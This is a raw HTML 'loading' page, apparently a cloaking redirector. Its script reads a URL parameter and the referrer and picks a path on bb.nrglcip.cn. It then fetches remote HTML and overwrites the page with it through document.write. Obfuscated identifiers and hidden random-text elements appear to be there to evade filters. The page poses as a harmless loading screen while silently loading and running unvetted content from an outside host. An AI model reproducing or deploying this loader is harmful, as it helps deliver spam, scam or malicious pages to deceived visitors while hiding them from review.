<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .gV6kii94W {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .gV6kii94W .gMznLgr {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .gV6kii94W .content {
            line-height: 50px;
            text-align: center
        }

        .gV6kii94W .img {
            width: 100%
        }

        .gV6kii94W .EhcuRWNHJ {
            text-align: center
        }

        .gV6kii94W .EhcuRWNHJ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .gV6kii94W .EhcuRWNHJ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .gV6kii94W .EhcuRWNHJ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .gV6kii94W .EhcuRWNHJ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .gV6kii94W .EhcuRWNHJ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .gV6kii94W .EhcuRWNHJ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .gV6kii94W .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function O7vJ2GZOhSg(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var iD71Y48 = O7vJ2GZOhSg('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ iD71Y48 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ iD71Y48 +".html?a=share";
		}
		
        TAghGIWPYE=url+"#"+new Date().getTime();
        TAghGIWPYE && function() {
            $.get(TAghGIWPYE, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >hidy3mONBMRBooNYPFcjJpu</ul>
<p  style='display:none'>cfaO6zgDTzMuJhuZRuaMWe9inL0bpB5rv1bc0XxiRw4q08oT8zgbdXSzIPvRy3P6ogD</p>
<span style='display:none'>Oko2zW7evmXk1ZBrVS79Z3PYEh4oreW4uLzeAmHMNdQDtX0iAtTZ9493avwGF31hZMZoqTcDaAUbd3GZfwbmut</span>
<a  href='#' style='display:none'>crwz3FZW98hTaWjeg0</a>
<img  src='' style='display:none'>
<ul style='display:none' >hidy3mONBMRBooNYPFcjJpu</ul>
<img  src='' style='display:none'>
<p  style='display:none'>cfaO6zgDTzMuJhuZRuaMWe9inL0bpB5rv1bc0XxiRw4q08oT8zgbdXSzIPvRy3P6ogD</p><div class="gV6kii94W">
    <div class="gMznLgr">
        <div class="EhcuRWNHJ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >pOP3FgWtDMrQSFHHEYT6WYjktZiDmM8KhMjB8QKrS87</ul>
<ul style='display:none' >pOP3FgWtDMrQSFHHEYT6WYjktZiDmM8KhMjB8QKrS87</ul>
<div style='display:none'>yNVWekbJ9D87z5W91EJtdjJT3Xep8NlCAIPZxPatA7OBBGZiMOq8KWhVNdSm42d8</div></body>
</html>